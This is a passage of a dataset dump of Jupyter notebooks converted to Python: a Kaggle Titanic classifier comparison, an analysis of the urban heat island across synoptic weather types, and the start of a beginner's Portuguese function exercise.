return(df)\n\n\ndf_train3=data_prep(df_train2)\ndf_train3[:5]\n\ndf_test3=data_prep(df_test2)\ndf_test3[:5]\n\n# d)\n\nx=df_train3.drop(['Survived'],axis=1)\ny=df_train3['Survived']\nx.head()\n\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test=train_test_split(x,y,stratify=y,random_state=0)\n\nfrom sklearn.preprocessing import StandardScaler\nscaler=StandardScaler()\nscaler.fit(x_train[['Pclass','Size','Alone']])\nx_train_scaled=x_train.copy()\nx_train_scaled[['Pclass','Size','Alone']]=scaler.transform(x_train[['Pclass','Size','Alone']])\nx_test_scaled=x_test.copy()\nx_test_scaled[['Pclass','Size','Alone']]=scaler.transform(x_test[['Pclass','Size','Alone']])\ndf_test3_scaled=df_test3.copy()\ndf_test3_scaled[['Pclass','Size','Alone']]=scaler.transform(df_test3[['Pclass','Size','Alone']])\nx_train_scaled[:5]\n\nx_knn=x[['Pclass','Size','Alone']].copy()\nx_knn[:5]\n\ndf_test_knn=df_test3[['Pclass','Size','Alone']].copy()\ndf_test_knn[:5]\n\nx_train_knn, x_test_knn, y_train_knn, y_test_knn=train_test_split(x_knn,y,stratify=y,random_state=0)\n\nfrom sklearn.preprocessing import MinMaxScaler\nscaler2=MinMaxScaler()\nscaler2.fit(x_train_knn)\nx_train_knn_scaled=scaler2.transform(x_train_knn)\nx_test_knn_scaled=scaler2.transform(x_test_knn)\ndf_test_knn_scaled=scaler2.transform(df_test_knn)\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import GridSearchCV\nparams1={'n_neighbors':list(range(1,21))}\nknn=KNeighborsClassifier()\ngrid_search1=GridSearchCV(knn,param_grid=params1,\n cv=5,\n return_train_score=True)\ngrid_search1.fit(x_train_knn_scaled,y_train_knn)\nbest_neighbors=grid_search1.best_estimator_.n_neighbors\nprint(best_neighbors)\n\nbest_knn=KNeighborsClassifier(n_neighbors=best_neighbors)\nbest_knn.fit(x_train_knn_scaled, y_train_knn)\nbest_knn.score(x_test_knn_scaled, y_test_knn)\n\nfrom sklearn.svm import SVC\nparams2={'kernel':['linear','poly','rbf','sigmoid'],\n 'C':[0.01,0.1,1,10,100],\n 'gamma':[0.5,1,2,3,4]}\nsvc=SVC()\ngrid_search2=GridSearchCV(svc,param_grid=params2,\n cv=5,\n return_train_score=True)\ngrid_search2.fit(x_train_scaled,y_train)\nbest_C=grid_search2.best_estimator_.C\nbest_kernel=grid_search2.best_estimator_.kernel\nbest_gamma=grid_search2.best_estimator_.gamma\nprint(best_C)\nprint(best_kernel)\nprint(best_gamma)\n\nbest_svc=SVC(C=best_C,kernel=best_kernel,gamma=best_gamma)\nbest_svc.fit(x_train_scaled, y_train)\nbest_svc.score(x_test_scaled, y_test)\n\nfrom sklearn.linear_model import LogisticRegression\nparams3={'C':list(10**np.linspace(0,20,21))}\nlogistic=LogisticRegression(solver='lbfgs',max_iter=1000)\ngrid_search3=GridSearchCV(logistic,param_grid=params3,\n cv=5,\n return_train_score=True)\ngrid_search3.fit(x_train,y_train)\nbest_C2=grid_search3.best_estimator_.C\nprint(best_C2)\n\nbest_logistic=LogisticRegression(C=best_C2,solver='lbfgs',max_iter=1000)\nbest_logistic.fit(x_train, y_train)\nbest_logistic.score(x_test, y_test)\n\nfrom sklearn.ensemble import RandomForestClassifier\nparams4={'max_features':list(range(1,14,2)),\n 'max_depth':list(range(4,9,2)),\n 'n_estimators':[100,300,500]}\nforest=RandomForestClassifier(random_state=0)\ngrid_search4=GridSearchCV(forest,param_grid=params4,\n cv=5,\n return_train_score=True)\ngrid_search4.fit(x_train,y_train.values.ravel())\nbest_features=grid_search4.best_estimator_.max_features\nbest_depth=grid_search4.best_estimator_.max_depth\nbest_estimators=grid_search4.best_estimator_.n_estimators\nprint(best_features)\nprint(best_depth)\nprint(best_estimators)\n\nbest_forest=RandomForestClassifier(max_features=best_features,n_estimators=best_estimators,max_depth=best_depth,random_state=0)\nbest_forest.fit(x_train,y_train.values.ravel())\nbest_forest.score(x_test,y_test)\n\nfrom sklearn.ensemble import GradientBoostingClassifier\nparams5={'learning_rate':[0.01, 0.05, 0.1, 0.15, 0.2],\n 'max_depth':list(range(4,9,2)),\n 'n_estimators':[10,25,50]}\ngradient=GradientBoostingClassifier(random_state=0)\ngrid_search5=GridSearchCV(gradient,param_grid=params5,\n cv=5,\n return_train_score=True)\ngrid_search5.fit(x_train,y_train)\nbest_rate=grid_search5.best_estimator_.learning_rate\nbest_depth2=grid_search5.best_estimator_.max_depth\nbest_estimators2=grid_search5.best_estimator_.n_estimators\nprint(best_rate)\nprint(best_depth2)\nprint(best_estimators2)\n\nbest_gradient=GradientBoostingClassifier(learning_rate=best_rate,n_estimators=best_estimators2,max_depth=best_depth2,random_state=0)\nbest_gradient.fit(x_train,y_train)\nbest_gradient.score(x_test,y_test)\n\nfrom sklearn.neural_network import MLPClassifier\nparams6={'hidden_layer_sizes':[[5],[5,5],[5,5,5],[10],[10,10],[10,10,10]],\n 'activation':['identity','logistic','tanh','relu']}\nmlp=MLPClassifier(max_iter=2000,random_state=0)\ngrid_search6=GridSearchCV(mlp,param_grid=params6,\n cv=5,\n return_train_score=True)\ngrid_search6.fit(x_train_scaled,y_train)\nbest_layer=grid_search6.best_estimator_.hidden_layer_sizes\nbest_activation=grid_search6.best_estimator_.activation\nprint(best_layer)\nprint(best_activation)\n\nbest_mlp=MLPClassifier(random_state=0,max_iter=2000,hidden_layer_sizes=best_layer,activation=best_activation)\nbest_mlp.fit(x_train_scaled,y_train)\nbest_mlp.score(x_test_scaled,y_test)\n\ndf_train_poly['Sex']=np.where(df_train_poly['Sex']=='male',1,0)\ndf_train_poly['Size']=df_train_poly['SibSp']+df_train_poly['Parch']\ndf_train_poly=df_train_poly.drop(['Embarked','SibSp','Parch'],axis=1)\nprint(df_train_poly.dtypes)\ndf_train_poly[:5]\n\nx_poly=df_train_poly.drop(['Survived'],axis=1)\ny_poly=df_train_poly['Survived']\nx_poly[:5]\n\ndf_test_poly['Sex']=np.where(df_test_poly['Sex']=='male',1,0)\ndf_test_poly['Size']=df_test_poly['SibSp']+df_test_poly['Parch']\ndf_test_poly=df_test_poly.drop(['Embarked','SibSp','Parch'],axis=1)\nprint(df_test_poly.dtypes)\ndf_test_poly[:5]\n\nx_train_poly, x_test_poly, y_train_poly, y_test_poly=train_test_split(x_poly,y_poly,stratify=y_poly,random_state=0)\n\nfrom sklearn.preprocessing import PolynomialFeatures\npoly=PolynomialFeatures()\nx_train_poly2=poly.fit_transform(x_train_poly)\nx_test_poly2=poly.fit_transform(x_test_poly)\ndf_test_poly2=poly.fit_transform(df_test_poly)\n\nx_train_poly2=pd.DataFrame(x_train_poly2,columns=poly.get_feature_names(x_train_poly.columns))\nx_train_poly2[:5]\n\nx_train_poly2=x_train_poly2.drop('1',axis=1)\nx_train_poly2[:5]\n\nx_test_poly2=pd.DataFrame(x_test_poly2,columns=poly.get_feature_names(x_test_poly.columns))\nx_test_poly2[:5]\n\nx_test_poly2=x_test_poly2.drop('1',axis=1)\nx_test_poly2[:5]\n\ndf_test_poly2=pd.DataFrame(df_test_poly2,columns=poly.get_feature_names(df_test_poly.columns))\ndf_test_poly2[:5]\n\ndf_test_poly2=df_test_poly2.drop('1',axis=1)\ndf_test_poly2[:5]\n\ngrid_search7=GridSearchCV(forest,param_grid=params4,\n cv=5,\n return_train_score=True)\ngrid_search7.fit(x_train_poly2,y_train_poly.values.ravel())\nbest_features7=grid_search7.best_estimator_.max_features\nbest_depth7=grid_search7.best_estimator_.max_depth\nbest_estimators7=grid_search7.best_estimator_.n_estimators\nprint(best_features7)\nprint(best_depth7)\nprint(best_estimators7)\n\nbest_poly=RandomForestClassifier(max_features=best_features7,n_estimators=best_estimators7,max_depth=best_depth7,random_state=0)\nbest_poly.fit(x_train_poly2,y_train_poly.values.ravel())\nbest_poly.score(x_test_poly2,y_test_poly)\n\nknn_pred=best_knn.predict(df_test_knn_scaled)\ntest_knn=df_test['PassengerId'].copy()\ntest_knn=pd.DataFrame(test_knn)\ntest_knn['Survived']=knn_pred\ntest_knn.to_csv(\"/Users/genie/Desktop/test_knn.csv\",index=None)\n\nsvc_pred=best_svc.predict(df_test3_scaled)\ntest_svc=df_test['PassengerId'].copy()\ntest_svc=pd.DataFrame(test_svc)\ntest_svc['Survived']=svc_pred\ntest_svc.to_csv(\"/Users/genie/Desktop/test_svc.csv\",index=None)\n\nlogistic_pred=best_logistic.predict(df_test3)\ntest_logistic=df_test['PassengerId'].copy()\ntest_logistic=pd.DataFrame(test_logistic)\ntest_logistic['Survived']=logistic_pred\ntest_logistic.to_csv(\"/Users/genie/Desktop/test_logistic.csv\",index=None)\n\nforest_pred=best_forest.predict(df_test3)\ntest_forest=df_test['PassengerId'].copy()\ntest_forest=pd.DataFrame(test_forest)\ntest_forest['Survived']=forest_pred\ntest_forest.to_csv(\"/Users/genie/Desktop/test_forest.csv\",index=None)\n\ngradient_pred=best_gradient.predict(df_test3)\ntest_gradient=df_test['PassengerId'].copy()\ntest_gradient=pd.DataFrame(test_gradient)\ntest_gradient['Survived']=gradient_pred\ntest_gradient.to_csv(\"/Users/genie/Desktop/test_gradient.csv\",index=None)\n\nmlp_pred=best_mlp.predict(df_test3_scaled)\ntest_mlp=df_test['PassengerId'].copy()\ntest_mlp=pd.DataFrame(test_mlp)\ntest_mlp['Survived']=mlp_pred\ntest_mlp.to_csv(\"/Users/genie/Desktop/test_mlp.csv\",index=None)\n\npoly_pred=best_poly.predict(df_test_poly2)\ntest_poly=df_test['PassengerId'].copy()\ntest_poly=pd.DataFrame(test_poly)\ntest_poly['Survived']=poly_pred\ntest_poly.to_csv(\"/Users/genie/Desktop/test_poly.csv\",index=None)\n\n# e) Kaggle name: Jeannie Gao Date:12/04/2020 Score: 0.78229\n\n# ![Screen%20Shot%202020-12-04%20at%207.49.36%20PM.png](attachment:Screen%20Shot%202020-12-04%20at%207.49.36%20PM.png)\n","repo_name":"JeannieG0301/Kaggle-Titanic","sub_path":"Kaggle-Titanic.ipynb","file_name":"Kaggle-Titanic.ipynb","file_ext":"py","file_size_in_byte":11110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"27457828566","text":"# import libraries\n# %matplotlib inline\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport glob\nimport ulmo\nimport os\nimport scipy.spatial\nplt.rcParams.update({'font.size': 18})\nimport matplotlib\n\nfrom scipy import stats\ndef easy_scatter(x,y,title='', xlabel='', ylabel='') : \n# plots x,y (need to be np array) and calculates and prints their best fit line\n ind = ~np.isnan(y) & ~np.isnan(x) # subset values that aren't NaNs\n if type(ind) == pd.core.series.Series : \n N = ind.sum()\n else: \n N = ind.shape\n m,b = np.polyfit(x[ind],y[ind],1)\n r, p = scipy.stats.pearsonr(x[ind], y[ind]) #np.corrcoef(x[ind],y[ind])[0,1]\n plt.scatter(x,y, color = 'grey')\n plt.plot(x, m*x+b, color = 'black')\n plt.title(title)\n plt.ylabel(ylabel)\n plt.xlabel(xlabel)\n # annotate the linear reqression, y = mx+b\n plt.annotate('y = %.2f x + %.2f'%(m,b), xy=(.5, .9), xycoords='axes fraction', horizontalalignment='left', verticalalignment='bottom')\n plt.annotate('r = %.2f'%(r), xy=(.5, .85), xycoords='axes fraction', horizontalalignment='left', verticalalignment='bottom')\n plt.annotate('p = %.2f'%(p), xy=(.5, .8), xycoords='axes fraction', horizontalalignment='left', verticalalignment='bottom')\n plt.annotate('N = %i'%(N), xy=(.5, .75), xycoords='axes fraction', horizontalalignment='left', verticalalignment='bottom')\n return m, r, p\n\n\n\npaired_df = pd.read_csv('USpairs2005-2015.csv').set_index('City', drop = False)\npaired_df = paired_df[paired_df['Urban distance'] < 0.25]\n\n# +\ncities = paired_df.index\nfilepath = 'data/synopticclassification/'\nstations = pd.read_table('data/synopticclassification/stations.txt', sep = ',')\n# #!mkdir plots/version6/ssc/\nresults_filepath = 'plots/version6/ssc/'\ncols = ['DM', 'DP', 'DT', 'MM', 'MP', 'MT', 'MTP','DMcount', 'DPcount', 'DTcount', 'MMcount', 'MPcount', 'MTcount', 'MTPcount', ]# ['DM', 'DP', 'DT', 'MM', 'MP', 'MT', 'MTP', 'Dry versus Moist p-value']\n# resultsDF = pd.DataFrame(np.ones([len(cities), 7])*np.nan, index = cities, \n# columns=['DM', 'DP', 'DT', 'MM', 'MP', 'MT', 'MTP'])\n# cities = ['Hartford', 'New York', 'Baltimore', 'Philadelphia', \n# #'Washington, D.C.', 'Richmond','Norfolk',\n# #'Providence', 'Buffalo', 'Pittsburgh',\n# ]\nUHI_resultsDF = pd.DataFrame(np.ones([len(cities), len(cols)])*np.nan, index = cities, \n columns=cols)\nurban_resultsDF = pd.DataFrame(np.ones([len(cities), len(cols)])*np.nan, index = cities, \n columns=cols)\nrural_resultsDF = pd.DataFrame(np.ones([len(cities), len(cols)])*np.nan, index = cities, \n columns=cols)\nfor city in paired_df.index: # cities[66:]: #paired_df.iloc[66:].index: #paired_df.index: \n#city = 'Washington'\n print(city)\n ssc_code = stations[stations['Station'].str.contains(city)]['ID'].values\n if city == 'Washington, D.C.': \n ssc_code = np.array(['IAD'])\n if ssc_code.shape[0] > 0: \n file = filepath + ssc_code[0] + '.dbdmt'\n synopticDF = pd.read_table(file, sep = ' ', header = None)\n synopticDF.columns = ['id','date', 'ssc']\n synopticDF.index = pd.PeriodIndex(synopticDF['date'], freq = 'D', name = 'month_period')\n synopticDF['ssc'].loc[synopticDF['ssc']> 60] =6.5\n synopticDF = synopticDF.loc['2000-06-01':]\n\n urbanID = paired_df.loc[city]['Urban station']\n ruralID = paired_df.loc[city]['Rural station']\n # Downloadd from NCDC the station data, using the station ID listed in station list\n urbandata = ulmo.ncdc.ghcn_daily.get_data(urbanID,\n as_dataframe=True, update = False)\n ruraldata = ulmo.ncdc.ghcn_daily.get_data(ruralID,\n as_dataframe=True, update = False)\n rural_tmin = pd.to_numeric(ruraldata['TMIN']['2000-01-01':'2015-8-31'].value/10.) #rural tmin\n urban_tmin = pd.to_numeric(urbandata['TMIN']['2000-01-01':'2015-8-31'].value/10.) \n # clean data: eliminate data with flags \n rural_tmin[~ruraldata['TMIN']['qflag'].isnull()] = np.nan\n urban_tmin[~urbandata['TMIN']['qflag'].isnull()] = np.nan\n\n # extract summertime data \n rural_summer = rural_tmin[(rural_tmin.index.month >= 6) & (rural_tmin.index.month <= 8)]\n urban_summer = urban_tmin[(urban_tmin.index.month >= 6) & (urban_tmin.index.month <= 8)]\n\n # clean data: eliminate min temperatures below 4 or above 35\n# rural_summer = rural_summer[(rural_summer>4) & (rural_summer<35)]\n# urban_summer = urban_summer[(urban_summer>4) & (urban_summer < 35)]\n\n\n #calculate UHI\n UHI = urban_summer - rural_summer\n\n #mean_UHI_dry_ssc = UHI[synopticDF['ssc'][synopticDF['ssc']<3].index].mean()\n #mean_UHI_wet_ssc = UHI[synopticDF['ssc'][(synopticDF['ssc']>=4) & (synopticDF['ssc']<6)].index].mean()\n UHI_resultsDF.loc[city, cols ] = [UHI[synopticDF['ssc']==1].mean(), \n UHI[synopticDF['ssc']==2].mean(), \n UHI[synopticDF['ssc']==3].mean(), \n UHI[synopticDF['ssc']==4].mean(),\n UHI[synopticDF['ssc']==5].mean(),\n UHI[synopticDF['ssc']==6].mean(), \n UHI[synopticDF['ssc']==6.5].mean(),\n # counts\n UHI[synopticDF['ssc']==1].shape[0], \n UHI[synopticDF['ssc']==2].shape[0], \n UHI[synopticDF['ssc']==3].shape[0], \n UHI[synopticDF['ssc']==4].shape[0],\n UHI[synopticDF['ssc']==5].shape[0],\n UHI[synopticDF['ssc']==6].shape[0], \n UHI[synopticDF['ssc']==6.5].shape[0],\n ]\n UHI_resultsDF.loc[city, 'Dry versus Moist p-value'] = scipy.stats.ttest_ind(UHI[synopticDF['ssc'] <=3].dropna(),\n UHI[synopticDF['ssc'] >3].dropna())[1]\n \n urban_resultsDF.loc[city, cols] = [urban_summer[synopticDF['ssc']==1].mean(), \n urban_summer[synopticDF['ssc']==2].mean(), \n urban_summer[synopticDF['ssc']==3].mean(), \n urban_summer[synopticDF['ssc']==4].mean(),\n urban_summer[synopticDF['ssc']==5].mean(),\n urban_summer[synopticDF['ssc']==6].mean(), \n urban_summer[synopticDF['ssc']==6.5].mean(), \n # counts\n urban_summer[synopticDF['ssc']==1].shape[0], \n urban_summer[synopticDF['ssc']==2].shape[0], \n urban_summer[synopticDF['ssc']==3].shape[0], \n urban_summer[synopticDF['ssc']==4].shape[0],\n urban_summer[synopticDF['ssc']==5].shape[0],\n urban_summer[synopticDF['ssc']==6].shape[0], \n urban_summer[synopticDF['ssc']==6.5].shape[0], \n ]\n urban_resultsDF.loc[city, 'Dry versus Moist p-value'] = scipy.stats.ttest_ind(urban_summer[synopticDF['ssc'] <=3].dropna(),\n urban_summer[synopticDF['ssc'] >3].dropna())[1]\n\n rural_resultsDF.loc[city, cols] = [rural_summer[synopticDF['ssc']==1].mean(), \n rural_summer[synopticDF['ssc']==2].mean(), \n rural_summer[synopticDF['ssc']==3].mean(), \n rural_summer[synopticDF['ssc']==4].mean(),\n rural_summer[synopticDF['ssc']==5].mean(),\n rural_summer[synopticDF['ssc']==6].mean(), \n rural_summer[synopticDF['ssc']==6.5].mean(),\n # counts\n rural_summer[synopticDF['ssc']==1].shape[0], \n rural_summer[synopticDF['ssc']==2].shape[0], \n rural_summer[synopticDF['ssc']==3].shape[0], \n rural_summer[synopticDF['ssc']==4].shape[0],\n rural_summer[synopticDF['ssc']==5].shape[0],\n rural_summer[synopticDF['ssc']==6].shape[0], \n rural_summer[synopticDF['ssc']==6.5].shape[0], \n ]\n rural_resultsDF.loc[city, 'Dry versus Moist p-value'] = scipy.stats.ttest_ind(rural_summer[synopticDF['ssc'] <=3].dropna(),\n rural_summer[synopticDF['ssc'] >3].dropna())[1]\n\n UHI_resultsDF.to_csv(results_filepath+'sscanalysis.csv')\n urban_resultsDF.to_csv(results_filepath+'urban_sscanalysis.csv')\n rural_resultsDF.to_csv(results_filepath+'rural_sscanalysis.csv')\n\n else: \n print('No synoptic station for %s'%city)\nUHI_resultsDF['Dry'] = UHI_resultsDF[['DM', 'DP', 'DT']].mean(axis=1)\nUHI_resultsDF['DryCount'] = UHI_resultsDF[['DMcount', 'DPcount', 'DTcount']].sum(axis=1)\nUHI_resultsDF['Moist'] = UHI_resultsDF[['MM', 'MP', 'MT', 'MTP']].mean(axis=1)\nUHI_resultsDF['MoistCount'] = UHI_resultsDF[['MMcount', 'MPcount', 'MTcount', 'MTPcount']].sum(axis=1)\nUHI_resultsDF.to_csv(results_filepath+'UHI_sscanalysis_withcounts.csv')\n\nurban_resultsDF['Dry'] = urban_resultsDF[['DM', 'DP', 'DT']].mean(axis=1)\nurban_resultsDF['DryCount'] = urban_resultsDF[['DMcount', 'DPcount', 'DTcount']].sum(axis=1)\nurban_resultsDF['Moist'] = urban_resultsDF[['MM', 'MP', 'MT', 'MTP']].mean(axis=1)\nurban_resultsDF['MoistCount'] = urban_resultsDF[['MMcount', 'MPcount', 'MTcount', 'MTPcount']].sum(axis=1)\nurban_resultsDF.to_csv(results_filepath+'urban_sscanalysis_withcounts.csv')\n\nrural_resultsDF['Dry'] = rural_resultsDF[['DM', 'DP', 'DT']].mean(axis=1)\nrural_resultsDF['DryCount'] = rural_resultsDF[['DMcount', 'DPcount', 'DTcount']].sum(axis=1)\nrural_resultsDF['Moist'] = rural_resultsDF[['MM', 'MP', 'MT', 'MTP']].mean(axis=1)\nrural_resultsDF['MoistCount'] = rural_resultsDF[['MMcount', 'MPcount', 'MTcount', 'MTPcount']].sum(axis=1)\nrural_resultsDF.to_csv(results_filepath+'rural_sscanalysis_withcounts.csv')\n# -\n\n\n\nresults_filepath = 'plots/version6/ssc/'\nind = paired_df[paired_df['Urban distance']<.25].index\nUHI_resultsDF = pd.read_csv(results_filepath+'sscanalysis.csv').set_index('City').loc[ind]\nurban_resultsDF = pd.read_csv(results_filepath+'urban_sscanalysis.csv').set_index('City').loc[ind]\nrural_resultsDF = pd.read_csv(results_filepath+'rural_sscanalysis.csv').set_index('City').loc[ind]\n\nurban_resultsDF['Dry'] = urban_resultsDF[['DM', 'DP', 'DT']].mean(axis=1)\nurban_resultsDF['Moist'] = urban_resultsDF[['MM', 'MP', 'MT', 'MTP']].mean(axis=1)\nrural_resultsDF['Dry'] = rural_resultsDF[['DM', 'DP', 'DT']].mean(axis=1)\nrural_resultsDF['Moist'] = rural_resultsDF[['MM', 'MP', 'MT', 'MTP']].mean(axis=1)\nUHI_resultsDF['Dry'] = UHI_resultsDF[['DM', 'DP', 'DT']].mean(axis=1)\nUHI_resultsDF['Moist'] = UHI_resultsDF[['MM', 'MP', 'MT', 'MTP']].mean(axis=1)\n\npaired_df[paired_df['Urban Lat'] > 26].shape\n\n# +\nfig = plt.figure(figsize = [16,5])\nax = plt.subplot(121)\ndata = [urban_resultsDF['Moist'].dropna(), urban_resultsDF['Dry'].dropna(), \n rural_resultsDF['Moist'].dropna(), rural_resultsDF['Dry'].dropna(), \n #UHI_resultsDF['Moist'].dropna(), UHI_resultsDF['Dry'].dropna(),\n ]\ndict = plt.boxplot(data)\nplt.ylabel('Temperature ($^\\circ C$)')\nplt.xticks([1,2,3,4,],['$T_{u}( {moist} )$', \n '$T_{u}( {dry} )$',\n '$T_{r}( {moist} )$',\n '$T_{r}( {dry})}$', \n ])\n #rotation = 45)#'vertical')\nxx = 1.25\nfor item in data: \n plt.annotate('%2.2f'%np.mean(item), xy = (xx, np.mean(item)))\n xx = xx+1\nax.set_title('a)')\n \nax2 = plt.subplot(122)\neasy_scatter(rural_resultsDF['Moist'].subtract(rural_resultsDF['Dry']),\n urban_resultsDF['Moist'].subtract(urban_resultsDF['Dry']),\n '' ,\n #'$\\Delta T_r$, Moist- Dry ($^\\circ C$)',\n '$\\overline{T}_{r}( {moist}) - \\overline{T}_{r}( {dry} ) $',\n '$\\overline{T}_{u}( {moist} ) - \\overline{T}_{u}( {dry} )$', \n #'$\\Delta T_u$, Moist - Dry ($^\\circ C$)', \n )\nplt.plot(rural_resultsDF['Moist'].subtract(rural_resultsDF['Dry']), \n rural_resultsDF['Moist'].subtract(rural_resultsDF['Dry']),)\n# highlight cities where difference is stat. significant\n# here significance is same for urban and rural, but may need to check if running results for different period\nsig_cities = urban_resultsDF[urban_resultsDF['Dry versus Moist p-value'] < 0.05].index\nplt.scatter(rural_resultsDF['Moist'].subtract(rural_resultsDF['Dry']).loc[sig_cities], \n urban_resultsDF['Moist'].subtract(urban_resultsDF['Dry']).loc[sig_cities],\n color = 'k')\nplt.title('b)')\n\nplt.legend(['Best fit', 'y=x', 'p>0.05', 'p<0.05'], loc = 4)\nplt.axhline(0, linestyle =':', color = 'k')\nplt.axvline(0, linestyle =':', color = 'k')\nplt.savefig('plots/version6/synopticwxTuTr.pdf')\nplt.savefig('plots/version6/figure4.eps')\n# -\n\ndata = [UHI_resultsDF['MoistCount'], UHI_resultsDF['DryCount']]\ndict = plt.boxplot(data)\nplt.ylabel('Number of Days')\ntix = plt.xticks([1,2,],['Moist', \n 'Dry',\n ])\nplt.title('Days for each Wx Type')\n\nurban_resultsDF\n\nUHI_resultsDF['MoistCount'].mean(), UHI_resultsDF['DryCount'].mean()\n\nUHI_resultsDF['Dry'].subtract(UHI_resultsDF['Moist']).mean(), UHI_resultsDF['Dry'].subtract(UHI_resultsDF['Moist']).std()\n\n# Dry UHI significantly different than moist in \na = UHI_resultsDF[UHI_resultsDF['Dry versus Moist p-value'] < 0.05].index.shape[0]\nb = UHI_resultsDF['Dry versus Moist p-value'].dropna().index.shape[0]\nc = a/float(b)\nprint('Dry UHI significantly different than moist in %i/%i cities (%2.2f %%)'%(a,b,c))\n\n# Dry urban significantly different than moist in \na = urban_resultsDF[urban_resultsDF['Dry versus Moist p-value'] < 0.05].index.shape[0]\nb = urban_resultsDF['Dry versus Moist p-value'].dropna().index.shape[0]\nc = a/float(b)\nprint('Dry $T_u$ significantly different than moist in %i/%i cities (%2.2f %%)'%(a,b,c))\n\n# Dry rural significantly different than moist in \na = rural_resultsDF[rural_resultsDF['Dry versus Moist p-value'] < 0.05].index.shape[0]\nb = rural_resultsDF['Dry versus Moist p-value'].dropna().index.shape[0]\nc = a/float(b)\nprint('Dry $T_r$ significantly different than moist in %i/%i cities (%2.2f %%)'%(a,b,c))\n\n# Are the cities for which T_u differs by synoptic type the the same cities for T_r? \nnp.setdiff1d(rural_resultsDF[rural_resultsDF['Dry versus Moist p-value'] < 0.05].index.shape[0], \n urban_resultsDF[urban_resultsDF['Dry versus Moist p-value'] < 0.05].index.shape[0])\n\npaired_df.shape\n\nUHI_resultsDF.shape\n\nx = 0.2\nind = paired_df[paired_df['Urban distance'] < x].index\nprint(UHI_resultsDF['Dry'].loc[ind].dropna().shape)\nprint(scipy.stats.ttest_ind(UHI_resultsDF['Dry'].loc[ind].dropna(),\n UHI_resultsDF['Moist'].loc[ind].dropna()))\nUHI_resultsDF['Dry'].loc[ind].subtract(UHI_resultsDF['Moist'].loc[ind]).mean()\n\n(UHI_resultsDF['Dry']- UHI_resultsDF['Moist']).loc[paired_df['Urban distance']< .25].hist()\n\n(UHI_resultsDF['Dry']- UHI_resultsDF['Moist']).loc[paired_df['Urban distance']< .2].mean()\n\nUHI_resultsDF['Dry'].hist()\n\nUHI_resultsDF['Moist'].hist()\n\n# +\n# replicate Darryn's Baltimore analysis for science center versus BWI\ncity = 'Baltimore'\nssc_code = stations[stations['Station'].str.contains(city)]['ID'].values\nif city == 'Washington, D.C.': \n ssc_code = np.array(['IAD'])\nif ssc_code.shape[0] > 0: \n file = filepath + ssc_code[0] + '.dbdmt'\n synopticDF = pd.read_table(file, sep = ' ', header = None)\n synopticDF.columns = ['id','date', 'ssc']\n synopticDF.index = pd.PeriodIndex(synopticDF['date'], freq = 'D', name = 'month_period')\n synopticDF['ssc'].loc[synopticDF['ssc']> 60] =6.5\n synopticDF = synopticDF.loc['1985-06-01':]\n\n urbanID = paired_df.loc[city]['Urban station']\n ruralID = paired_df.loc[city]['Rural station']\n # Downloadd from NCDC the station data, using the station ID listed in station list\n urbandata = ulmo.ncdc.ghcn_daily.get_data(urbanID,\n as_dataframe=True, update = False)\n ruraldata = ulmo.ncdc.ghcn_daily.get_data('USW00093721',#ruralID,\n as_dataframe=True, update = False)\n rural_tmin = pd.to_numeric(ruraldata['TMIN']['1985-01-01':].value/10.) #rural tmin\n urban_tmin = pd.to_numeric(urbandata['TMIN']['1985-01-01':].value/10.) \n\n # extract summertime data \n rural_summer = rural_tmin[(rural_tmin.index.month >= 6) & (rural_tmin.index.month <= 8)]\n urban_summer = urban_tmin[(urban_tmin.index.month >= 6) & (urban_tmin.index.month <= 8)]\n\n # clean data: eliminate min temperatures below 4 or above 35\n rural_summer = rural_summer[(rural_summer>4) & (rural_summer<35)]\n urban_summer = urban_summer[(urban_summer>4) & (urban_summer < 35)]\n\n #calculate UHI\n UHI = urban_summer - rural_summer\n\nrural_summer = rural_tmin[(rural_tmin.index.month >= 6) & (rural_tmin.index.month <= 8)]\nurban_summer = urban_tmin[(urban_tmin.index.month >= 6) & (urban_tmin.index.month <= 8)]\n\n# # clean data: eliminate min temperatures below 4 or above 35\n# rural_summer = rural_summer[(rural_summer>4) & (rural_summer<35)]\n# urban_summer = urban_summer[(urban_summer>4) & (urban_summer < 35)]\n\n#calculate UHI\nUHI = urban_summer - rural_summer\n# see if we can reproduce darryn's plots\nUHI = urban_summer - rural_summer\n\nfig, axes = plt.subplots(6,1, figsize = [4,20])\nplt.subplots_adjust(hspace=0.75)\ni = 0\nfor year in range(2009, 2015): \n x = synopticDF['ssc']\n y = UHI['%s-06-01'%year:'%s-08-30'%year]\n x = x[y.index]\n axes[i].scatter(x, y)\n d =y[x<=3].mean() - y[x>3].mean()\n axes[i].axhline(y[x<=3].mean(), xmin = .1, xmax=.4)\n axes[i].axhline(y[(x>3) & (x<7)].mean(), xmin = .5, xmax=.9)\n axes[i].annotate('Diff = %2.2f'%d , xy = (0.01,0.02), xycoords = 'axes fraction')\n axes[i].set_xlabel('ssc')\n axes[i].set_ylabel('UHI')\n axes[i].set_title('SC - BWI %s'%( year))\n i = i+1\n# -\n\n\n","repo_name":"gottscott/heat","sub_path":"Synoptic Wx Plots.ipynb","file_name":"Synoptic Wx Plots.ipynb","file_ext":"py","file_size_in_byte":18556,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-jupyter-script","pt":"30"} +{"seq_id":"18720340041","text":"# + [markdown] id=\"view-in-github\" colab_type=\"text\"\n# \"Open\n\n# + [markdown] id=\"g3H3AMmpK7-q\"\n# . Faça uma função que recebe, por parâmetro, um valor inteiro e positivo e retorna se ele é par.\n#\n#\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"zXR4c7qwK7Fd\" outputId=\"e5d91424-f484-499d-d6f3-a574fa255f07\"\nnumero=int(input(\"Entre com um número: \"))\ndef par(numero):\n if numero%2==0:\n resposta='S' \n else:\n resposta='N'\n return resposta\n\nresultado=par(numero)\nif resultado =='S':\n print('Eh par')\nelse:\n print('Eh impar') \n\n\n \n\n# + [markdown] id=\"jV3qntB8PnCE\"\n# Faça duas funções, ambas recebem um inteiro, por parâmetro, uma retorna o sucessor deste número e a outra retorna o antecessor.\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"Eaov7mn4Ppns\" outputId=\"b34bfce7-5f90-4179-a7c9-e1de1355209d\"\ndef sucessor(numero):\n resposta = numero+1\n return resposta\n\ndef antecessor(numero):\n resposta2 = numero-1\n 